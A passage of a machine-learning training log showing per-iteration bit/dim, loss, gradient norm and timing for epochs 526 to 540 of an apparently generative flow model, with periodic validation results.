0.0000(0.0000) Steps 452(448.64) | Grad Norm 0.0552(0.0927) | Total Time 10.00(10.00)\nIter 5658 | Time 39.1486(40.5594) | Bit/dim 1.0726(1.0746) | Xent 0.0000(0.0000) | Loss 1.0726(1.0746) | Error 0.0000(0.0000) Steps 446(448.56) | Grad Norm 0.0965(0.0928) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0526 | Time 15.2624, Epoch Time 310.6551(311.2664), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5659 | Time 41.4983(40.5875) | Bit/dim 1.0756(1.0746) | Xent 0.0000(0.0000) | Loss 1.0756(1.0746) | Error 0.0000(0.0000) Steps 446(448.48) | Grad Norm 0.1529(0.0946) | Total Time 10.00(10.00)\nIter 5660 | Time 41.4265(40.6127) | Bit/dim 1.0698(1.0744) | Xent 0.0000(0.0000) | Loss 1.0698(1.0744) | Error 0.0000(0.0000) Steps 452(448.59) | Grad Norm 0.0844(0.0943) | Total Time 10.00(10.00)\nIter 5661 | Time 41.9409(40.6525) | Bit/dim 1.0704(1.0743) | Xent 0.0000(0.0000) | Loss 1.0704(1.0743) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.0606(0.0933) | Total Time 10.00(10.00)\nIter 5662 | Time 39.3347(40.6130) | Bit/dim 1.0782(1.0744) | Xent 0.0000(0.0000) | Loss 1.0782(1.0744) | Error 0.0000(0.0000) Steps 446(448.61) | Grad Norm 0.0824(0.0930) | Total Time 10.00(10.00)\nIter 5663 | Time 41.4873(40.6392) | Bit/dim 1.0758(1.0745) | Xent 0.0000(0.0000) | Loss 1.0758(1.0745) | Error 0.0000(0.0000) Steps 446(448.53) | Grad Norm 0.1443(0.0945) | Total Time 10.00(10.00)\nIter 5664 | Time 41.4566(40.6638) | Bit/dim 1.0754(1.0745) | Xent 0.0000(0.0000) | Loss 1.0754(1.0745) | Error 0.0000(0.0000) Steps 452(448.63) | Grad Norm 0.0916(0.0944) | Total Time 10.00(10.00)\nIter 5665 | Time 40.5012(40.6589) | Bit/dim 1.0738(1.0745) | Xent 0.0000(0.0000) | Loss 1.0738(1.0745) | Error 0.0000(0.0000) Steps 446(448.56) | Grad Norm 0.0611(0.0934) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0527 | Time 15.1268, Epoch Time 315.1811(311.3839), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5666 | Time 41.1142(40.6725) | Bit/dim 1.0775(1.0746) | Xent 0.0000(0.0000) | Loss 1.0775(1.0746) | Error 0.0000(0.0000) Steps 452(448.66) | Grad Norm 0.1298(0.0945) | Total Time 10.00(10.00)\nIter 5667 | Time 42.4912(40.7271) | Bit/dim 1.0752(1.0746) | Xent 0.0000(0.0000) | Loss 1.0752(1.0746) | Error 0.0000(0.0000) Steps 446(448.58) | Grad Norm 0.0889(0.0944) | Total Time 10.00(10.00)\nIter 5668 | Time 40.3183(40.7148) | Bit/dim 1.0726(1.0745) | Xent 0.0000(0.0000) | Loss 1.0726(1.0745) | Error 0.0000(0.0000) Steps 446(448.50) | Grad Norm 0.0727(0.0937) | Total Time 10.00(10.00)\nIter 5669 | Time 39.1909(40.6691) | Bit/dim 1.0737(1.0745) | Xent 0.0000(0.0000) | Loss 1.0737(1.0745) | Error 0.0000(0.0000) Steps 446(448.43) | Grad Norm 0.0576(0.0926) | Total Time 10.00(10.00)\nIter 5670 | Time 41.2236(40.6858) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 452(448.53) | Grad Norm 0.0546(0.0915) | Total Time 10.00(10.00)\nIter 5671 | Time 39.1708(40.6403) | Bit/dim 1.0767(1.0746) | Xent 0.0000(0.0000) | Loss 1.0767(1.0746) | Error 0.0000(0.0000) Steps 446(448.46) | Grad Norm 0.1019(0.0918) | Total Time 10.00(10.00)\nIter 5672 | Time 40.6295(40.6400) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0854(0.0916) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0528 | Time 15.1555, Epoch Time 312.0528(311.4040), Bit/dim 1.0694(best: 1.0688), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5673 | Time 39.9542(40.6194) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 446(448.49) | Grad Norm 0.0757(0.0911) | Total Time 10.00(10.00)\nIter 5674 | Time 40.8987(40.6278) | Bit/dim 1.0751(1.0745) | Xent 0.0000(0.0000) | Loss 1.0751(1.0745) | Error 0.0000(0.0000) Steps 452(448.59) | Grad Norm 0.1066(0.0916) | Total Time 10.00(10.00)\nIter 5675 | Time 40.8310(40.6339) | Bit/dim 1.0744(1.0745) | Xent 0.0000(0.0000) | Loss 1.0744(1.0745) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.1043(0.0920) | Total Time 10.00(10.00)\nIter 5676 | Time 40.2517(40.6224) | Bit/dim 1.0782(1.0746) | Xent 0.0000(0.0000) | Loss 1.0782(1.0746) | Error 0.0000(0.0000) Steps 452(448.79) | Grad Norm 0.0563(0.0909) | Total Time 10.00(10.00)\nIter 5677 | Time 41.0270(40.6346) | Bit/dim 1.0735(1.0746) | Xent 0.0000(0.0000) | Loss 1.0735(1.0746) | Error 0.0000(0.0000) Steps 446(448.71) | Grad Norm 0.0734(0.0904) | Total Time 10.00(10.00)\nIter 5678 | Time 39.2006(40.5915) | Bit/dim 1.0745(1.0746) | Xent 0.0000(0.0000) | Loss 1.0745(1.0746) | Error 0.0000(0.0000) Steps 446(448.63) | Grad Norm 0.1012(0.0907) | Total Time 10.00(10.00)\nIter 5679 | Time 39.2079(40.5500) | Bit/dim 1.0753(1.0746) | Xent 0.0000(0.0000) | Loss 1.0753(1.0746) | Error 0.0000(0.0000) Steps 446(448.55) | Grad Norm 0.0858(0.0906) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0529 | Time 15.1441, Epoch Time 309.0903(311.3345), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5680 | Time 41.6058(40.5817) | Bit/dim 1.0721(1.0745) | Xent 0.0000(0.0000) | Loss 1.0721(1.0745) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.0724(0.0900) | Total Time 10.00(10.00)\nIter 5681 | Time 40.1879(40.5699) | Bit/dim 1.0769(1.0746) | Xent 0.0000(0.0000) | Loss 1.0769(1.0746) | Error 0.0000(0.0000) Steps 446(448.40) | Grad Norm 0.1037(0.0904) | Total Time 10.00(10.00)\nIter 5682 | Time 40.0276(40.5536) | Bit/dim 1.0743(1.0746) | Xent 0.0000(0.0000) | Loss 1.0743(1.0746) | Error 0.0000(0.0000) Steps 446(448.33) | Grad Norm 0.1033(0.0908) | Total Time 10.00(10.00)\nIter 5683 | Time 40.5036(40.5521) | Bit/dim 1.0737(1.0746) | Xent 0.0000(0.0000) | Loss 1.0737(1.0746) | Error 0.0000(0.0000) Steps 452(448.44) | Grad Norm 0.0908(0.0908) | Total Time 10.00(10.00)\nIter 5684 | Time 40.6916(40.5563) | Bit/dim 1.0748(1.0746) | Xent 0.0000(0.0000) | Loss 1.0748(1.0746) | Error 0.0000(0.0000) Steps 452(448.54) | Grad Norm 0.0690(0.0902) | Total Time 10.00(10.00)\nIter 5685 | Time 42.0432(40.6009) | Bit/dim 1.0734(1.0745) | Xent 0.0000(0.0000) | Loss 1.0734(1.0745) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.1204(0.0911) | Total Time 10.00(10.00)\nIter 5686 | Time 40.8638(40.6088) | Bit/dim 1.0731(1.0745) | Xent 0.0000(0.0000) | Loss 1.0731(1.0745) | Error 0.0000(0.0000) Steps 452(448.57) | Grad Norm 0.1704(0.0934) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0530 | Time 15.4002, Epoch Time 313.9058(311.4117), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5687 | Time 40.5936(40.6083) | Bit/dim 1.0732(1.0745) | Xent 0.0000(0.0000) | Loss 1.0732(1.0745) | Error 0.0000(0.0000) Steps 452(448.68) | Grad Norm 0.0685(0.0927) | Total Time 10.00(10.00)\nIter 5688 | Time 39.9600(40.5889) | Bit/dim 1.0735(1.0744) | Xent 0.0000(0.0000) | Loss 1.0735(1.0744) | Error 0.0000(0.0000) Steps 452(448.78) | Grad Norm 0.0791(0.0923) | Total Time 10.00(10.00)\nIter 5689 | Time 39.5345(40.5573) | Bit/dim 1.0787(1.0746) | Xent 0.0000(0.0000) | Loss 1.0787(1.0746) | Error 0.0000(0.0000) Steps 446(448.69) | Grad Norm 0.1921(0.0953) | Total Time 10.00(10.00)\nIter 5690 | Time 39.8809(40.5370) | Bit/dim 1.0790(1.0747) | Xent 0.0000(0.0000) | Loss 1.0790(1.0747) | Error 0.0000(0.0000) Steps 446(448.61) | Grad Norm 0.0848(0.0950) | Total Time 10.00(10.00)\nIter 5691 | Time 40.5922(40.5386) | Bit/dim 1.0704(1.0746) | Xent 0.0000(0.0000) | Loss 1.0704(1.0746) | Error 0.0000(0.0000) Steps 458(448.89) | Grad Norm 0.0742(0.0943) | Total Time 10.00(10.00)\nIter 5692 | Time 42.1587(40.5872) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 452(448.99) | Grad Norm 0.2144(0.0979) | Total Time 10.00(10.00)\nIter 5693 | Time 39.6368(40.5587) | Bit/dim 1.0732(1.0745) | Xent 0.0000(0.0000) | Loss 1.0732(1.0745) | Error 0.0000(0.0000) Steps 452(449.08) | Grad Norm 0.1248(0.0987) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0531 | Time 15.1841, Epoch Time 309.8531(311.3649), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5694 | Time 40.6406(40.5612) | Bit/dim 1.0761(1.0745) | Xent 0.0000(0.0000) | Loss 1.0761(1.0745) | Error 0.0000(0.0000) Steps 452(449.17) | Grad Norm 0.0695(0.0979) | Total Time 10.00(10.00)\nIter 5695 | Time 39.5994(40.5323) | Bit/dim 1.0753(1.0745) | Xent 0.0000(0.0000) | Loss 1.0753(1.0745) | Error 0.0000(0.0000) Steps 452(449.25) | Grad Norm 0.1097(0.0982) | Total Time 10.00(10.00)\nIter 5696 | Time 39.3350(40.4964) | Bit/dim 1.0755(1.0746) | Xent 0.0000(0.0000) | Loss 1.0755(1.0746) | Error 0.0000(0.0000) Steps 446(449.15) | Grad Norm 0.1548(0.0999) | Total Time 10.00(10.00)\nIter 5697 | Time 40.0687(40.4836) | Bit/dim 1.0743(1.0746) | Xent 0.0000(0.0000) | Loss 1.0743(1.0746) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0884(0.0996) | Total Time 10.00(10.00)\nIter 5698 | Time 39.4401(40.4523) | Bit/dim 1.0744(1.0746) | Xent 0.0000(0.0000) | Loss 1.0744(1.0746) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0874(0.0992) | Total Time 10.00(10.00)\nIter 5699 | Time 40.9272(40.4665) | Bit/dim 1.0709(1.0744) | Xent 0.0000(0.0000) | Loss 1.0709(1.0744) | Error 0.0000(0.0000) Steps 452(449.40) | Grad Norm 0.1773(0.1016) | Total Time 10.00(10.00)\nIter 5700 | Time 41.4609(40.4963) | Bit/dim 1.0739(1.0744) | Xent 0.0000(0.0000) | Loss 1.0739(1.0744) | Error 0.0000(0.0000) Steps 452(449.48) | Grad Norm 0.0816(0.1010) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0532 | Time 15.0380, Epoch Time 308.9234(311.2917), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5701 | Time 39.5747(40.4687) | Bit/dim 1.0756(1.0745) | Xent 0.0000(0.0000) | Loss 1.0756(1.0745) | Error 0.0000(0.0000) Steps 446(449.37) | Grad Norm 0.0796(0.1003) | Total Time 10.00(10.00)\nIter 5702 | Time 41.4109(40.4970) | Bit/dim 1.0706(1.0744) | Xent 0.0000(0.0000) | Loss 1.0706(1.0744) | Error 0.0000(0.0000) Steps 446(449.27) | Grad Norm 0.0659(0.0993) | Total Time 10.00(10.00)\nIter 5703 | Time 39.7847(40.4756) | Bit/dim 1.0742(1.0743) | Xent 0.0000(0.0000) | Loss 1.0742(1.0743) | Error 0.0000(0.0000) Steps 446(449.18) | Grad Norm 0.1701(0.1014) | Total Time 10.00(10.00)\nIter 5704 | Time 41.8734(40.5175) | Bit/dim 1.0740(1.0743) | Xent 0.0000(0.0000) | Loss 1.0740(1.0743) | Error 0.0000(0.0000) Steps 452(449.26) | Grad Norm 0.1180(0.1019) | Total Time 10.00(10.00)\nIter 5705 | Time 39.8258(40.4968) | Bit/dim 1.0736(1.0743) | Xent 0.0000(0.0000) | Loss 1.0736(1.0743) | Error 0.0000(0.0000) Steps 452(449.34) | Grad Norm 0.0688(0.1009) | Total Time 10.00(10.00)\nIter 5706 | Time 41.8474(40.5373) | Bit/dim 1.0800(1.0745) | Xent 0.0000(0.0000) | Loss 1.0800(1.0745) | Error 0.0000(0.0000) Steps 446(449.24) | Grad Norm 0.1246(0.1016) | Total Time 10.00(10.00)\nIter 5707 | Time 40.0877(40.5238) | Bit/dim 1.0752(1.0745) | Xent 0.0000(0.0000) | Loss 1.0752(1.0745) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0875(0.1012) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0533 | Time 15.2931, Epoch Time 312.1853(311.3185), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5708 | Time 40.6041(40.5262) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.1276(0.1020) | Total Time 10.00(10.00)\nIter 5709 | Time 41.1463(40.5448) | Bit/dim 1.0778(1.0746) | Xent 0.0000(0.0000) | Loss 1.0778(1.0746) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0750(0.1012) | Total Time 10.00(10.00)\nIter 5710 | Time 40.1075(40.5317) | Bit/dim 1.0718(1.0745) | Xent 0.0000(0.0000) | Loss 1.0718(1.0745) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.1221(0.1018) | Total Time 10.00(10.00)\nIter 5711 | Time 39.3428(40.4960) | Bit/dim 1.0772(1.0746) | Xent 0.0000(0.0000) | Loss 1.0772(1.0746) | Error 0.0000(0.0000) Steps 452(449.47) | Grad Norm 0.0905(0.1015) | Total Time 10.00(10.00)\nIter 5712 | Time 40.8798(40.5075) | Bit/dim 1.0707(1.0745) | Xent 0.0000(0.0000) | Loss 1.0707(1.0745) | Error 0.0000(0.0000) Steps 452(449.54) | Grad Norm 0.0545(0.1001) | Total Time 10.00(10.00)\nIter 5713 | Time 40.6463(40.5117) | Bit/dim 1.0737(1.0744) | Xent 0.0000(0.0000) | Loss 1.0737(1.0744) | Error 0.0000(0.0000) Steps 452(449.62) | Grad Norm 0.0753(0.0993) | Total Time 10.00(10.00)\nIter 5714 | Time 41.0906(40.5291) | Bit/dim 1.0767(1.0745) | Xent 0.0000(0.0000) | Loss 1.0767(1.0745) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.0851(0.0989) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0534 | Time 15.0380, Epoch Time 311.5847(311.3265), Bit/dim 1.0694(best: 1.0688), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5715 | Time 41.8778(40.5695) | Bit/dim 1.0762(1.0746) | Xent 0.0000(0.0000) | Loss 1.0762(1.0746) | Error 0.0000(0.0000) Steps 446(449.40) | Grad Norm 0.0708(0.0981) | Total Time 10.00(10.00)\nIter 5716 | Time 39.7789(40.5458) | Bit/dim 1.0738(1.0745) | Xent 0.0000(0.0000) | Loss 1.0738(1.0745) | Error 0.0000(0.0000) Steps 452(449.48) | Grad Norm 0.1282(0.0990) | Total Time 10.00(10.00)\nIter 5717 | Time 39.5321(40.5154) | Bit/dim 1.0708(1.0744) | Xent 0.0000(0.0000) | Loss 1.0708(1.0744) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0702(0.0981) | Total Time 10.00(10.00)\nIter 5718 | Time 42.7123(40.5813) | Bit/dim 1.0744(1.0744) | Xent 0.0000(0.0000) | Loss 1.0744(1.0744) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0596(0.0969) | Total Time 10.00(10.00)\nIter 5719 | Time 41.5723(40.6110) | Bit/dim 1.0781(1.0745) | Xent 0.0000(0.0000) | Loss 1.0781(1.0745) | Error 0.0000(0.0000) Steps 446(449.52) | Grad Norm 0.0618(0.0959) | Total Time 10.00(10.00)\nIter 5720 | Time 41.4395(40.6359) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 446(449.42) | Grad Norm 0.0632(0.0949) | Total Time 10.00(10.00)\nIter 5721 | Time 40.2160(40.6233) | Bit/dim 1.0755(1.0745) | Xent 0.0000(0.0000) | Loss 1.0755(1.0745) | Error 0.0000(0.0000) Steps 446(449.31) | Grad Norm 0.0628(0.0939) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0535 | Time 14.9954, Epoch Time 314.8559(311.4324), Bit/dim 1.0694(best: 1.0688), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5722 | Time 39.8141(40.5990) | Bit/dim 1.0742(1.0745) | Xent 0.0000(0.0000) | Loss 1.0742(1.0745) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0676(0.0932) | Total Time 10.00(10.00)\nIter 5723 | Time 39.2260(40.5578) | Bit/dim 1.0748(1.0745) | Xent 0.0000(0.0000) | Loss 1.0748(1.0745) | Error 0.0000(0.0000) Steps 446(449.29) | Grad Norm 0.0516(0.0919) | Total Time 10.00(10.00)\nIter 5724 | Time 42.1622(40.6060) | Bit/dim 1.0748(1.0745) | Xent 0.0000(0.0000) | Loss 1.0748(1.0745) | Error 0.0000(0.0000) Steps 446(449.19) | Grad Norm 0.0617(0.0910) | Total Time 10.00(10.00)\nIter 5725 | Time 42.0659(40.6498) | Bit/dim 1.0771(1.0746) | Xent 0.0000(0.0000) | Loss 1.0771(1.0746) | Error 0.0000(0.0000) Steps 452(449.28) | Grad Norm 0.1076(0.0915) | Total Time 10.00(10.00)\nIter 5726 | Time 41.8358(40.6853) | Bit/dim 1.0706(1.0745) | Xent 0.0000(0.0000) | Loss 1.0706(1.0745) | Error 0.0000(0.0000) Steps 452(449.36) | Grad Norm 0.0644(0.0907) | Total Time 10.00(10.00)\nIter 5727 | Time 39.4454(40.6481) | Bit/dim 1.0769(1.0745) | Xent 0.0000(0.0000) | Loss 1.0769(1.0745) | Error 0.0000(0.0000) Steps 446(449.26) | Grad Norm 0.0792(0.0903) | Total Time 10.00(10.00)\nIter 5728 | Time 39.5804(40.6161) | Bit/dim 1.0712(1.0744) | Xent 0.0000(0.0000) | Loss 1.0712(1.0744) | Error 0.0000(0.0000) Steps 446(449.16) | Grad Norm 0.0614(0.0895) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0536 | Time 15.0466, Epoch Time 311.8912(311.4461), Bit/dim 1.0693(best: 1.0688), Xent 0.0000, Loss 1.0693, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5729 | Time 40.5201(40.6132) | Bit/dim 1.0808(1.0746) | Xent 0.0000(0.0000) | Loss 1.0808(1.0746) | Error 0.0000(0.0000) Steps 452(449.25) | Grad Norm 0.0615(0.0886) | Total Time 10.00(10.00)\nIter 5730 | Time 42.4252(40.6676) | Bit/dim 1.0722(1.0746) | Xent 0.0000(0.0000) | Loss 1.0722(1.0746) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0781(0.0883) | Total Time 10.00(10.00)\nIter 5731 | Time 39.2028(40.6236) | Bit/dim 1.0748(1.0746) | Xent 0.0000(0.0000) | Loss 1.0748(1.0746) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.0831(0.0882) | Total Time 10.00(10.00)\nIter 5732 | Time 41.0826(40.6374) | Bit/dim 1.0726(1.0745) | Xent 0.0000(0.0000) | Loss 1.0726(1.0745) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0678(0.0875) | Total Time 10.00(10.00)\nIter 5733 | Time 40.7519(40.6408) | Bit/dim 1.0720(1.0744) | Xent 0.0000(0.0000) | Loss 1.0720(1.0744) | Error 0.0000(0.0000) Steps 446(449.21) | Grad Norm 0.0530(0.0865) | Total Time 10.00(10.00)\nIter 5734 | Time 42.0717(40.6838) | Bit/dim 1.0737(1.0744) | Xent 0.0000(0.0000) | Loss 1.0737(1.0744) | Error 0.0000(0.0000) Steps 446(449.12) | Grad Norm 0.0743(0.0861) | Total Time 10.00(10.00)\nIter 5735 | Time 40.9497(40.6917) | Bit/dim 1.0715(1.0743) | Xent 0.0000(0.0000) | Loss 1.0715(1.0743) | Error 0.0000(0.0000) Steps 452(449.20) | Grad Norm 0.1249(0.0873) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0537 | Time 15.2027, Epoch Time 314.7604(311.5456), Bit/dim 1.0689(best: 1.0688), Xent 0.0000, Loss 1.0689, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5736 | Time 41.8051(40.7251) | Bit/dim 1.0725(1.0743) | Xent 0.0000(0.0000) | Loss 1.0725(1.0743) | Error 0.0000(0.0000) Steps 446(449.11) | Grad Norm 0.0591(0.0865) | Total Time 10.00(10.00)\nIter 5737 | Time 41.3509(40.7439) | Bit/dim 1.0762(1.0743) | Xent 0.0000(0.0000) | Loss 1.0762(1.0743) | Error 0.0000(0.0000) Steps 452(449.19) | Grad Norm 0.1074(0.0871) | Total Time 10.00(10.00)\nIter 5738 | Time 39.7199(40.7132) | Bit/dim 1.0778(1.0744) | Xent 0.0000(0.0000) | Loss 1.0778(1.0744) | Error 0.0000(0.0000) Steps 452(449.28) | Grad Norm 0.0720(0.0866) | Total Time 10.00(10.00)\nIter 5739 | Time 40.2338(40.6988) | Bit/dim 1.0749(1.0744) | Xent 0.0000(0.0000) | Loss 1.0749(1.0744) | Error 0.0000(0.0000) Steps 446(449.18) | Grad Norm 0.0656(0.0860) | Total Time 10.00(10.00)\nIter 5740 | Time 40.4397(40.6910) | Bit/dim 1.0737(1.0744) | Xent 0.0000(0.0000) | Loss 1.0737(1.0744) | Error 0.0000(0.0000) Steps 446(449.08) | Grad Norm 0.1087(0.0867) | Total Time 10.00(10.00)\nIter 5741 | Time 40.7199(40.6919) | Bit/dim 1.0750(1.0744) | Xent 0.0000(0.0000) | Loss 1.0750(1.0744) | Error 0.0000(0.0000) Steps 452(449.17) | Grad Norm 0.0714(0.0862) | Total Time 10.00(10.00)\nIter 5742 | Time 41.5719(40.7183) | Bit/dim 1.0735(1.0744) | Xent 0.0000(0.0000) | Loss 1.0735(1.0744) | Error 0.0000(0.0000) Steps 452(449.26) | Grad Norm 0.0719(0.0858) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0538 | Time 15.3092, Epoch Time 314.0019(311.6192), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5743 | Time 40.8925(40.7235) | Bit/dim 1.0725(1.0744) | Xent 0.0000(0.0000) | Loss 1.0725(1.0744) | Error 0.0000(0.0000) Steps 446(449.16) | Grad Norm 0.0601(0.0850) | Total Time 10.00(10.00)\nIter 5744 | Time 39.8990(40.6988) | Bit/dim 1.0752(1.0744) | Xent 0.0000(0.0000) | Loss 1.0752(1.0744) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0941(0.0853) | Total Time 10.00(10.00)\nIter 5745 | Time 39.8912(40.6746) | Bit/dim 1.0759(1.0744) | Xent 0.0000(0.0000) | Loss 1.0759(1.0744) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0886(0.0854) | Total Time 10.00(10.00)\nIter 5746 | Time 41.0268(40.6851) | Bit/dim 1.0744(1.0744) | Xent 0.0000(0.0000) | Loss 1.0744(1.0744) | Error 0.0000(0.0000) Steps 452(449.41) | Grad Norm 0.0847(0.0854) | Total Time 10.00(10.00)\nIter 5747 | Time 38.9058(40.6318) | Bit/dim 1.0741(1.0744) | Xent 0.0000(0.0000) | Loss 1.0741(1.0744) | Error 0.0000(0.0000) Steps 446(449.30) | Grad Norm 0.0667(0.0848) | Total Time 10.00(10.00)\nIter 5748 | Time 40.0567(40.6145) | Bit/dim 1.0734(1.0744) | Xent 0.0000(0.0000) | Loss 1.0734(1.0744) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0794(0.0847) | Total Time 10.00(10.00)\nIter 5749 | Time 39.7336(40.5881) | Bit/dim 1.0741(1.0744) | Xent 0.0000(0.0000) | Loss 1.0741(1.0744) | Error 0.0000(0.0000) Steps 446(449.28) | Grad Norm 0.0651(0.0841) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0539 | Time 15.2290, Epoch Time 308.2560(311.5183), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5750 | Time 41.1225(40.6041) | Bit/dim 1.0781(1.0745) | Xent 0.0000(0.0000) | Loss 1.0781(1.0745) | Error 0.0000(0.0000) Steps 446(449.19) | Grad Norm 0.0650(0.0835) | Total Time 10.00(10.00)\nIter 5751 | Time 39.7430(40.5783) | Bit/dim 1.0723(1.0744) | Xent 0.0000(0.0000) | Loss 1.0723(1.0744) | Error 0.0000(0.0000) Steps 452(449.27) | Grad Norm 0.0651(0.0829) | Total Time 10.00(10.00)\nIter 5752 | Time 42.2105(40.6272) | Bit/dim 1.0773(1.0745) | Xent 0.0000(0.0000) | Loss 1.0773(1.0745) | Error 0.0000(0.0000) Steps 452(449.35) | Grad Norm 0.1157(0.0839) | Total Time 10.00(10.00)\nIter 5753 | Time 40.5713(40.6256) | Bit/dim 1.0717(1.0744) | Xent 0.0000(0.0000) | Loss 1.0717(1.0744) | Error 0.0000(0.0000) Steps 452(449.43) | Grad Norm 0.0609(0.0832) | Total Time 10.00(10.00)\nIter 5754 | Time 41.4022(40.6489) | Bit/dim 1.0733(1.0744) | Xent 0.0000(0.0000) | Loss 1.0733(1.0744) | Error 0.0000(0.0000) Steps 446(449.33) | Grad Norm 0.0963(0.0836) | Total Time 10.00(10.00)\nIter 5755 | Time 40.6583(40.6491) | Bit/dim 1.0729(1.0743) | Xent 0.0000(0.0000) | Loss 1.0729(1.0743) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.0769(0.0834) | Total Time 10.00(10.00)\nIter 5756 | Time 41.8019(40.6837) | Bit/dim 1.0716(1.0743) | Xent 0.0000(0.0000) | Loss 1.0716(1.0743) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0606(0.0827) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0540 | Time 15.1755, Epoch Time 314.9930(311.6226), Bit/dim 1.0690(best: 1.0688), Xent 0.0000, Loss 1.0690, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5757 | Time 39.5057(40.6484) | Bit/dim 1.0768(1.0743) | Xent 0.0000(0.0000) | Loss 1.0768(1.0743) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0605(0.0821) | Total Time 10.00(10.00)\nIter 5758 | Time 41.9033(40.6860) | Bit/dim 1.0735(1.0743) | Xent 0.0000(0.0000) | Loss 1.0735(1.0743) | Error 0.0000(0.0000) Steps 452(449.47) | Grad Norm 0.0772(0.0819) | Total Time 10.00(10.00)\nIter 5759 | Time 38.8543(40.6311) | Bit/dim 1.0755(1.0744) | Xent 0.0000(0.0000) | Loss 1.0755(1.0744) | Error 0.0000(0.0000) Steps 452(449.55) | Grad Norm 0.0615(0.0813) | Total Time 10.00(10.00)\nIter 5760 | Time 40.4946(40.6270) | Bit/dim 1.0749(1.0744) | Xent 0.0000(0.0000) | Loss 1.0749(1.0744) | Error 0.0000(0.0000) Steps 446(449.44) | Grad Norm 0.0813(0.0813) | Total Time 10.00(10.00)\nIter 5761 | Time 40.6381(40.6273) | Bit/dim 1.0715(1.0743) | Xent 0.0000(0.0000) | Loss 1.0715(1.0743) | Error 0.0000(0.0000) Steps 446(449.34) | Grad Norm 0.1192(0.0825) | Total Time 10.00(10.00)\nIter 5762 | Time 41.0444(40.6398) | 